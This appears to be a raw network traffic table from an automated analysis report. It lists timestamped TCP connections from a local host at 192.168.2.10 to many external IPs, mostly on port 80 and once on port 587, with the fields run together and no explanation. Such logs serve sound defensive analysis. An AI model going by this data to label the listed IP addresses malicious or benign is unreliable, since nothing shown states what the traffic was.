                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.111305952 CET805007618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.111417055 CET5007680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.126454115 CET5007880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.131330013 CET805007818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.131402016 CET5007880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.131499052 CET5007880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.131511927 CET5007880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.136696100 CET805007818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.137021065 CET805007818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.312267065 CET5007980192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.317342997 CET80500793.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.317441940 CET5007980192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.317615032 CET5007980192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.317697048 CET5007980192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.322634935 CET80500793.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.322649002 CET80500793.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.799309969 CET805007818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.801548958 CET5007880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.807037115 CET805007818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.807180882 CET5007880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.025429964 CET5008080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.030529976 CET805008044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.033660889 CET5008080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.033890009 CET5008080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.033890009 CET5008080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.038893938 CET805008044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.039252043 CET805008044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.299871922 CET80500793.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.300071001 CET5007980192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.305680037 CET80500793.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.305749893 CET5007980192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.576273918 CET5008180192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.454215050 CET5008680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.514930964 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.520108938 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.520215988 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.520540953 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.520540953 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.525535107 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.525568962 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.636329889 CET805008713.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.636660099 CET5008780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.642111063 CET805008713.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.644246101 CET5008780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.650930882 CET5008980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.656003952 CET805008913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.659653902 CET5008980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.659861088 CET5008980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.659893990 CET5008980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.664760113 CET805008913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.664773941 CET805008913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.980665922 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.985508919 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.990971088 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.991036892 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.373539925 CET5009080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.378637075 CET80500903.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.378717899 CET5009080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.379667044 CET5009080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.379697084 CET5009080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.384541988 CET80500903.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.384572029 CET80500903.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.048280954 CET80500903.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.048465967 CET5009080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.054565907 CET80500903.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.054653883 CET5009080192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.102804899 CET805008913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.102977991 CET5008980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.108561993 CET805008913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.108633995 CET5008980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.118742943 CET5009180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.123747110 CET805009134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.123823881 CET5009180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.123914957 CET5009180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.123929977 CET5009180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.128848076 CET805009134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.128859997 CET805009134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.551805019 CET5009280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.557811975 CET805009235.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.557889938 CET5009280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.558059931 CET5009280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.558084965 CET5009280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.563170910 CET805009235.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.563183069 CET805009235.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.955321074 CET805009134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.955521107 CET5009180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.960829020 CET805009134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.960884094 CET5009180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.847132921 CET5009980192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.847132921 CET5009980192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.853105068 CET80500993.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.853118896 CET80500993.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.522224903 CET805009844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.537281990 CET5009880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.542630911 CET80500993.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.542828083 CET5009980192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.543262005 CET805009844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.543327093 CET5009880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.548640966 CET80500993.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.548700094 CET5009980192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.579000950 CET5010080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.584964037 CET805010018.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.585030079 CET5010080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.597117901 CET5010080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.597150087 CET5010080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.602160931 CET805010018.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.602279902 CET805010018.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.843369007 CET5010180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.848913908 CET805010134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.849008083 CET5010180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.849193096 CET5010180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.849193096 CET5010180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.855341911 CET805010134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.855365038 CET805010134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.443185091 CET805010018.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.443406105 CET5010080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.449455023 CET805010018.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.449660063 CET5010080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.464534998 CET5010280192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.470247984 CET80501023.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.470716953 CET5010280192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.470851898 CET5010280192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.470865965 CET5010280192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.476528883 CET80501023.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.476547003 CET80501023.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.740752935 CET805010134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.741022110 CET5010180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.746651888 CET805010134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.746728897 CET5010180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.036477089 CET5010380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.041718006 CET805010318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.041791916 CET5010380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.041922092 CET5010380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.041944027 CET5010380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.046890020 CET805010318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.046901941 CET805010318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.446110010 CET80501023.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.446260929 CET5010280192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.451884985 CET80501023.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.451961994 CET5010280192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.458858967 CET5010480192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.464158058 CET805010485.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.464241028 CET5010480192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.464350939 CET5010480192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.310873985 CET5011180192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.316055059 CET805011118.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.316164970 CET5011180192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.316297054 CET5011180192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.316323042 CET5011180192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.321428061 CET805011118.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.321459055 CET805011118.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.162082911 CET805011118.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.162328005 CET5011180192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.167922020 CET805011118.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.167993069 CET5011180192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.410995960 CET5011280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.416117907 CET805011218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.416230917 CET5011280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.416376114 CET5011280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.416405916 CET5011280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.421308994 CET805011218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.421323061 CET805011218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.476994991 CET805011047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.477166891 CET5011080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.482496023 CET805011047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.482584000 CET5011080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.490102053 CET5011380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.495028019 CET805011318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.495157003 CET5011380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.495194912 CET5011380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.495480061 CET5011380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.500451088 CET805011318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.500643969 CET805011318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.527806997 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.533003092 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.773081064 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.773653984 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.091928005 CET805011218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.092461109 CET5011280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.097718954 CET805011218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.100948095 CET5011280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.169465065 CET805011318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.169620037 CET5011380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.175986052 CET805011318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.176060915 CET5011380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.191019058 CET5011480192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.195988894 CET805011413.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.196063042 CET5011480192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.196141958 CET5011480192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.196160078 CET5011480192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.201174021 CET805011413.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.201302052 CET805011413.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.363358974 CET5011580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.369128942 CET805011544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.369199991 CET5011580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.369318008 CET5011580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.369334936 CET5011580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.374826908 CET805011544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.374842882 CET805011544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.197458029 CET5012280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.197602034 CET5012280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.197626114 CET5012280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.202701092 CET805012218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.202737093 CET805012218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.570369959 CET805012113.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.570658922 CET5012180192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.579124928 CET805012113.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.580662966 CET5012180192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.675434113 CET5012380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.680774927 CET805012318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.680891037 CET5012380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.681026936 CET5012380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.681081057 CET5012380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.685866117 CET805012318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.685918093 CET805012318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.738790989 CET805010485.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.738869905 CET5010480192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.741633892 CET5010480192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.746870041 CET805010485.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.088054895 CET805012218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.088236094 CET5012280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.093655109 CET805012218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.093748093 CET5012280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.357831955 CET805012318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.358045101 CET5012380192.168.2.1018.208.156.248
